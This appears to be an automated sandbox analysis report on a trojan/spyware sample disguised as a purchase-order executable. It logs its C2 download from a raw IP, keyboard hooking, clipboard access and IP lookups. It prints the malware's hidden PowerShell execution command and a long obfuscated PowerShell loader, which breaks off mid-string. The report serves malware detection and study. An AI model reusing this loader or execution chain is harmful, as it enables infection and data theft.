                Source: unknownTCP traffic detected without corresponding DNS query: 172.96.14.41
                Source: unknownTCP traffic detected without corresponding DNS query: 172.96.14.41
                Source: unknownTCP traffic detected without corresponding DNS query: 172.96.14.41
                Source: unknownTCP traffic detected without corresponding DNS query: 172.96.14.41
                Source: unknownTCP traffic detected without corresponding DNS query: 172.96.14.41
                Source: unknownTCP traffic detected without corresponding DNS query: 172.96.14.41
                Source: unknownTCP traffic detected without corresponding DNS query: 172.96.14.41
                Source: unknownTCP traffic detected without corresponding DNS query: 172.96.14.41
                Source: unknownTCP traffic detected without corresponding DNS query: 172.96.14.41
                Source: unknownTCP traffic detected without corresponding DNS query: 172.96.14.41
                Source: unknownTCP traffic detected without corresponding DNS query: 172.96.14.41
                Source: unknownTCP traffic detected without corresponding DNS query: 172.96.14.41
                Source: unknownTCP traffic detected without corresponding DNS query: 172.96.14.41
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /mfMeuTZ127.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: 172.96.14.41Cache-Control: no-cache
                Source: unknownDNS traffic detected: queries for: api.ipify.org
                Source: MSBuild.exe, 00000005.00000002.2591099574.00000000042C0000.00000004.00001000.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.2591135790.0000000004322000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://172.96.14.41/mfMeuTZ127.bin
                Source: MSBuild.exe, 00000005.00000002.2591135790.0000000004322000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://172.96.14.41/mfMeuTZ127.bin&
                Source: MSBuild.exe, 00000005.00000002.2609495360.0000000020360000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.2609495360.0000000020331000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.2629380508.000000002255D000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.2609495360.00000000201A4000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.2629380508.00000000224BB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apps.identrust.com/roots/dstrootcax3.p7c0
                Source: MSBuild.exe, 00000005.00000002.2609495360.0000000020360000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.2609495360.0000000020331000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.2629380508.000000002255D000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.2609495360.00000000201A4000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.2629380508.00000000224BB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cps.root-x1.letsencrypt.org0
                Source: MSBuild.exe, 00000005.00000002.2609495360.0000000020360000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.2609495360.0000000020331000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.2629380508.000000002255D000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.2609495360.00000000201A4000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.2629380508.00000000224BB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.identrust.com/DSTROOTCAX3CRL.crl0
                Source: powershell.exe, 00000004.00000002.1605116373.000000000748B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoft
                Source: MSBuild.exe, 00000005.00000002.2609495360.0000000020360000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.2609495360.0000000020331000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.2609495360.000000002019C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mail.qualityaf.com
                Source: PO_00290292.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
                Source: powershell.exe, 00000002.00000002.1717924574.0000000005E09000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1604051248.0000000005BC9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                Source: powershell.exe, 00000004.00000002.1602165346.0000000004CCF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                Source: MSBuild.exe, 00000005.00000002.2609495360.0000000020360000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.2609495360.0000000020331000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.2629380508.000000002255D000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.2609495360.00000000201A4000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.2629380508.00000000224BB000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.2629380508.0000000022498000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://r3.i.lencr.org/0)
                Source: MSBuild.exe, 00000005.00000002.2609495360.0000000020360000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.2609495360.0000000020331000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.2629380508.000000002255D000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.2609495360.00000000201A4000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.2629380508.00000000224BB000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.2629380508.0000000022498000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://r3.o.lencr.org0
                Source: powershell.exe, 00000002.00000002.1700157482.0000000004DA1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1602165346.0000000004B61000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.2609495360.0000000020121000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: powershell.exe, 00000004.00000002.1602165346.0000000004CCF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                Source: powershell.exe, 00000004.00000002.1605116373.000000000748B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.coB
                Source: MSBuild.exe, 00000005.00000002.2609495360.0000000020360000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.2609495360.0000000020331000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.2591135790.00000000042EB000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.2629380508.000000002255D000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.2609495360.00000000201A4000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.2629380508.00000000224BB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
                Source: MSBuild.exe, 00000005.00000002.2609495360.0000000020360000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.2609495360.0000000020331000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.2591135790.00000000042EB000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.2629380508.000000002255D000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.2609495360.00000000201A4000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.2629380508.00000000224BB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
                Source: powershell.exe, 00000002.00000002.1700157482.0000000004DA1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1602165346.0000000004B61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
                Source: MSBuild.exe, 00000005.00000002.2609495360.0000000020121000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org
                Source: MSBuild.exe, 00000005.00000002.2609495360.0000000020121000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/
                Source: MSBuild.exe, 00000005.00000002.2609495360.0000000020121000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/t
                Source: powershell.exe, 00000004.00000002.1604051248.0000000005BC9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                Source: powershell.exe, 00000004.00000002.1604051248.0000000005BC9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                Source: powershell.exe, 00000004.00000002.1604051248.0000000005BC9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                Source: powershell.exe, 00000004.00000002.1602165346.0000000004CCF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                Source: powershell.exe, 00000002.00000002.1717924574.0000000005E09000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1604051248.0000000005BC9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49672 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49676 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49703 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49671 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49703
                Source: unknownHTTPS traffic detected: 104.237.62.211:443 -> 192.168.2.8:49709 version: TLS 1.2

                Key, Mouse, Clipboard, Microphone and Screen Capturing

                barindex
                Contains functionality to register a low level keyboard hook
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_2322CB90 SetWindowsHookExA 0000000D,00000000,?,?,?,?,?,?,?,?,?,2322D1F8,00000000,000000005_2_2322CB90
                Installs a global keyboard hook
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindows user hook set: 0 keyboard low level C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exeJump to behavior
                Source: C:\Users\user\Desktop\PO_00290292.exeCode function: 0_2_0040541C GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,FindCloseChangeNotification,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_0040541C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior

                System Summary

                barindex
                Initial sample is a PE file and has a suspicious name
                Source: initial sampleStatic PE information: Filename: PO_00290292.exe
                Very long command line found
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: Commandline size = 26008
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: Commandline size = 26008Jump to behavior
                Source: C:\Users\user\Desktop\PO_00290292.exeCode function: 0_2_004033B6 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,ExitProcess,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_004033B6
                Source: C:\Users\user\Desktop\PO_00290292.exeCode function: 0_2_004068460_2_00406846
                Source: C:\Users\user\Desktop\PO_00290292.exeCode function: 0_2_00404C590_2_00404C59
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_00AB41E85_2_00AB41E8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_00ABB3595_2_00ABB359
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_00ABE8B85_2_00ABE8B8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_00AB4AB85_2_00AB4AB8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_00ABAA605_2_00ABAA60
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_00AB3EA05_2_00AB3EA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0118A2C55_2_0118A2C5
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_232254BB5_2_232254BB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_232254C85_2_232254C8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_23221F385_2_23221F38
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_232323585_2_23232358
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_2323B25B5_2_2323B25B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_23235D005_2_23235D00
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_232355A85_2_232355A8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_2323C1B85_2_2323C1B8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_2323E3D05_2_2323E3D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_232376B05_2_232376B0
                Source: PO_00290292.exeStatic PE information: invalid certificate
                Source: PO_00290292.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                Source: classification engineClassification label: mal100.spre.troj.spyw.evad.winEXE@8/15@2/3
                Source: C:\Users\user\Desktop\PO_00290292.exeCode function: 0_2_004033B6 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,ExitProcess,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_004033B6
                Source: C:\Users\user\Desktop\PO_00290292.exeCode function: 0_2_004046DD GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_004046DD
                Source: C:\Users\user\Desktop\PO_00290292.exeCode function: 0_2_00402095 CoCreateInstance,0_2_00402095
                Source: C:\Users\user\Desktop\PO_00290292.exeFile created: C:\Users\user\Pictures\ledelsersJump to behavior
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5592:120:WilError_03
                Source: C:\Users\user\Desktop\PO_00290292.exeFile created: C:\Users\user\AppData\Local\Temp\nse6572.tmpJump to behavior
                Source: PO_00290292.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a403a0b75e95c07da2caa7f780446a62\mscorlib.ni.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a403a0b75e95c07da2caa7f780446a62\mscorlib.ni.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a403a0b75e95c07da2caa7f780446a62\mscorlib.ni.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                Source: C:\Users\user\Desktop\PO_00290292.exeFile read: C:\Users\desktop.iniJump to behavior
                Source: C:\Users\user\Desktop\PO_00290292.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: PO_00290292.exeVirustotal: Detection: 15%
                Source: C:\Users\user\Desktop\PO_00290292.exeFile read: C:\Users\user\Desktop\PO_00290292.exeJump to behavior
                Source: unknownProcess created: C:\Users\user\Desktop\PO_00290292.exe C:\Users\user\Desktop\PO_00290292.exe
                Source: C:\Users\user\Desktop\PO_00290292.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden $derremc = Get-Content 'C:\Users\user\AppData\Local\blindsmagningen\Nonprocurement\Lection.Fle' ; powershell.exe "$derremc"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Spejlvende Journaliseringssystems Conservatorial #><#Basilikers Toothcomb Letfordrvelig #>$Portugals = """Ko;SmFOmu RnFac FtTwiStoFonDe OtPAlyInxHui PdSkeInsEr4 F In{ S tv Po fi TupOvaBerGaafomPa(sm[BeS Tt HrPeiAunOsgEv]Ov`$SpSuioBelAnfPsa UlCedTo)Fo;bu Go`$OvNSkoOprDetNohObuRhm Cb OeLirAal BaTonbodDe Fu=Sk Ru`$ VSSpoAnlVafHeaPulHldRe.CiLHaePrnAsgFatInh M;Ne L Vi Af Ta`$PoD RrAniElf OtSvsPasUnyexs OtSteRimBumreeRetAnsSm Tr=Ch NoNArevvwAp-LaO NbSojOpe DcStt P Tb Ry FtSneVa[Pr]Wh Ud(Le`$miNBioLir VtPahMuuUdm TbSaeperGalAfaInnDedLi Op/ci St2Bo)An; K Ps`$PrRfioCadUntUme PgAnnGyeovtAn1St6Ug8Ab=Pi' CS AU D'In+ P'EdBUnSSpTBoRUnIThNDoG l'Aa;Af Da Co Im TF FoWarDe( D`$StNEnoChnCyetexNupudeOvccrt FaTanPatPa= U0Pl;No Ho`$NoNByoHjnUtelix Tp OeSoc St FaUnnSvtSy Op-ShlTetRe J`$KoNakoVurActQuh SuBumUdbYeeovrOrlSuaMinCrdcr;Li U`$SeNMaoPinTrePaxAlpspeLocHetSmaUnnBetBa+ro= G2Tr) P{Se Un He He Un Au Ko Ta ar`$PoDDer BiDefTet BsTrsBoyThs BtNaeunmKnmWaeAmtDosCa[ S`$ScNUgoBlnMaeApxEkpCaeRec At HaInnentDr/Ho2 U] K Ka= S Da[stcSmoPan BvSkeLer OtOb] N:Zi:UnTreoAaB SyBrt GeHa( d`$ JSMaoWilkofHoaOvlHodOm.No`$AtRPaoPodGitage NgTnnMaemat F1re6Ar8Be.CoI FnPhvSpoNektieJo(Fl`$PhN Do OnBoe RxCop ReSicTatInaSanBatJo,Ln Sp2Fu)Ep,Tr K1Cl6Un)Br;Po in F`$gaDPerChiMefKotRasOvsTey SsRetBoeFimSumIne wtUdsFi[Ar`$TrNMoo Sn Ue DxCypByeRocCotAnaNunomtTe/Ph2No]st Ar=So HaxGaoKnrSoaQummiiBa Sk`$MoDShrSei Sf UtsosPrsSpyLesdotBieDimDomRreUntSps P[ U`$UnNAroRen AeBexHopGee Sc PtBaaInnIntEa/Be2ov]Fi Po1Pl1 M0Gl;ra N un Po Fl}Fo Ou[PsSCotUnrPhiSynSogUn]De[PeSSuy PsLitSkepymIn.KaTSoe LxAntEu.SiEVan Dc UodedPriFnn PgSp]Ph: e:AyAPoSOoC MIFuIJa.PaGGee LtBeSCatStrEri wnUng B(da`$ElDCarIsiAtfPat BsChs SyMnsPttSeeUdmOvmaueDrtPas E)Ra;Un}St`$VeEBismetBjiGamSteHarDiiHanTogSmetorCh0 D=KoPGrySvxPuiOvdSme Ks l4Fi Sk'Au3StDHo1Af7Bo1TrDal1SyAsp0SiBri0 H3Cr4Af0Ma0PlABa0Af2 B0Gr2St'Ga;Ov`$deENesNetTiiFimBreKirSaiLenWagfjeBorLe1Py=AuP lyLexUniFedCleGesat4Op Fa'Ra2Pr3ta0 e7 D0KlDUn1NoCCo0Li1 R1 TDWe0Un1 D0Yv8Su1 TA O4 R0 A3ny9Sl0Fo7Cr0In0Ta5DaD K5ThCLo4 W0Kd3 KB F0Em0ig1SkD D0ReF R0ir8Bu0FoBOp2Ir0De0 SFUg1arAMa0St7Va1Be8 A0UnBKa2Ge3Ho0JuB A1 RA A0Vi6 G0 G1An0DeAHa1KaDPr'Wh; V`$ CEKos StSoi SmEneUnr ui TnNog SeOvrMe2As=ApPTaySaxDriUndreeTesSp4In ap'In2 d9Bl0CrBSa1 AAUn3MaESk1VaCun0Ch1Te0DdDin2SlFBu0SaAAl0TeA F1DyC D0TaBSt1 KDEl1TrDbr'Ra;Ca`$FaEHasSetPaiNim ReElrHai FnStgUre Irgr3 I=LaPGayWexfliBddSoeBosPa4No ek'Re3StDIn1mi7Un1RuDCp1 NA N0maBRo0Fa3 V4Ma0Br3UnC F1MiBZo0 H0So1FeAKa0Ma7Bl0Un3 C0CaB D4Mo0Pr2Da7Sc0Ho0Hu1ReA I0DiBFj1AgCFl0Ud1Su1SeEHo3PhDFo0CaBCo1 TCgr1re8Ma0 D7An0UdDBo0AtBJu1VeDPo4Jo0Mi2 P6 P0 SFFo0Ju0re0CoA S0Bl2 S0 LBUn3CaCNd0UnBLo0Af8 B' M;In`$DeECosDrtDri Sm se UrTriOunRegSke MrPr4Ti=deP IyPexSpiSpdCee FsSu4Zo Zo'At1PaDva1SoA E1ReCud0 B7Ha0 E0Mi0 A9Ti'No;Sw`$SeEHasBltSeiPamKoeOvrPoiGrnGegObe ArWi5Sk=DiPabyToxGaiSedOre GsVo4St D' F2Da9Ko0 MBtr1LiAAd2 U3Fe0Sl1sk0UnA P1asBTr0Do2
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe
                Source: C:\Users\user\Desktop\PO_00290292.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden $derremc = Get-Content 'C:\Users\user\AppData\Local\blindsmagningen\Nonprocurement\Lection.Fle' ; powershell.exe "$derremc"Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Spejlvende Journaliseringssystems Conservatorial #><#Basilikers Toothcomb Letfordrvelig #>$Portugals = """Ko;SmFOmu RnFac FtTwiStoFonDe OtPAlyInxHui PdSkeInsEr4 F In{ S tv Po fi TupOvaBerGaafomPa(sm[BeS Tt HrPeiAunOsgEv]Ov`$SpSuioBelAnfPsa UlCedTo)Fo;bu Go`$OvNSkoOprDetNohObuRhm Cb OeLirAal BaTonbodDe Fu=Sk Ru`$ VSSpoAnlVafHeaPulHldRe.CiLHaePrnAsgFatInh M;Ne L Vi Af Ta`$PoD RrAniElf OtSvsPasUnyexs OtSteRimBumreeRetAnsSm Tr=Ch NoNArevvwAp-LaO NbSojOpe DcStt P Tb Ry FtSneVa[Pr]Wh Ud(Le`$miNBioLir VtPahMuuUdm TbSaeperGalAfaInnDedLi Op/ci St2Bo)An; K Ps`$PrRfioCadUntUme PgAnnGyeovtAn1St6Ug8Ab=Pi' CS AU D'In+ P'EdBUnSSpTBoRUnIThNDoG l'Aa;Af Da Co Im TF FoWarDe( D`$StNEnoChnCyetexNupudeOvccrt FaTanPatPa= U0Pl;No Ho`$NoNByoHjnUtelix Tp OeSoc St FaUnnSvtSy Op-ShlTetRe J`$KoNakoVurActQuh SuBumUdbYeeovrOrlSuaMinCrdcr;Li U`$SeNMaoPinTrePaxAlpspeLocHetSmaUnnBetBa+ro= G2Tr) P{Se Un He He Un Au Ko Ta ar`$PoDDer BiDefTet BsTrsBoyThs BtNaeunmKnmWaeAmtDosCa[ S`$ScNUgoBlnMaeApxEkpCaeRec At HaInnentDr/Ho2 U] K Ka= S Da[stcSmoPan BvSkeLer OtOb] N:Zi:UnTreoAaB SyBrt GeHa( d`$ JSMaoWilkofHoaOvlHodOm.No`$AtRPaoPodGitage NgTnnMaemat F1re6Ar8Be.CoI FnPhvSpoNektieJo(Fl`$PhN Do OnBoe RxCop ReSicTatInaSanBatJo,Ln Sp2Fu)Ep,Tr K1Cl6Un)Br;Po in F`$gaDPerChiMefKotRasOvsTey SsRetBoeFimSumIne wtUdsFi[Ar`$TrNMoo Sn Ue DxCypByeRocCotAnaNunomtTe/Ph2No]st Ar=So HaxGaoKnrSoaQummiiBa Sk`$MoDShrSei Sf UtsosPrsSpyLesdotBieDimDomRreUntSps P[ U`$UnNAroRen AeBexHopGee Sc PtBaaInnIntEa/Be2ov]Fi Po1Pl1 M0Gl;ra N un Po Fl}Fo Ou[PsSCotUnrPhiSynSogUn]De[PeSSuy PsLitSkepymIn.KaTSoe LxAntEu.SiEVan Dc UodedPriFnn PgSp]Ph: e:AyAPoSOoC MIFuIJa.PaGGee LtBeSCatStrEri wnUng B(da`$ElDCarIsiAtfPat BsChs SyMnsPttSeeUdmOvmaueDrtPas E)Ra;Un}St`$VeEBismetBjiGamSteHarDiiHanTogSmetorCh0 D=KoPGrySvxPuiOvdSme Ks l4Fi Sk'Au3StDHo1Af7Bo1TrDal1SyAsp0SiBri0 H3Cr4Af0Ma0PlABa0Af2 B0Gr2St'Ga;Ov`$deENesNetTiiFimBreKirSaiLenWagfjeBorLe1Py=AuP lyLexUniFedCleGesat4Op Fa'Ra2Pr3ta0 e7 D0KlDUn1NoCCo0Li1 R1 TDWe0Un1 D0Yv8Su1 TA O4 R0 A3ny9Sl0Fo7Cr0In0Ta5DaD K5ThCLo4 W0Kd3 KB F0Em0ig1SkD D0ReF R0ir8Bu0FoBOp2Ir0De0 SFUg1arAMa0St7Va1Be8 A0UnBKa2Ge3Ho0JuB A1 RA A0Vi6 G0 G1An0DeAHa1KaDPr'Wh; V`$ CEKos StSoi SmEneUnr ui TnNog SeOvrMe2As=ApPTaySaxDriUndreeTesSp4In ap'In2 d9Bl0CrBSa1 AAUn3MaESk1VaCun0Ch1Te0DdDin2SlFBu0SaAAl0TeA F1DyC D0TaBSt1 KDEl1TrDbr'Ra;Ca`$FaEHasSetPaiNim ReElrHai FnStgUre Irgr3 I=LaPGayWexfliBddSoeBosPa4No ek'Re3StDIn1mi7Un1RuDCp1 NA N0maBRo0Fa3 V4Ma0Br3UnC F1MiBZo0 H0So1FeAKa0Ma7Bl0Un3 C0CaB D4Mo0Pr2Da7Sc0Ho0Hu1ReA 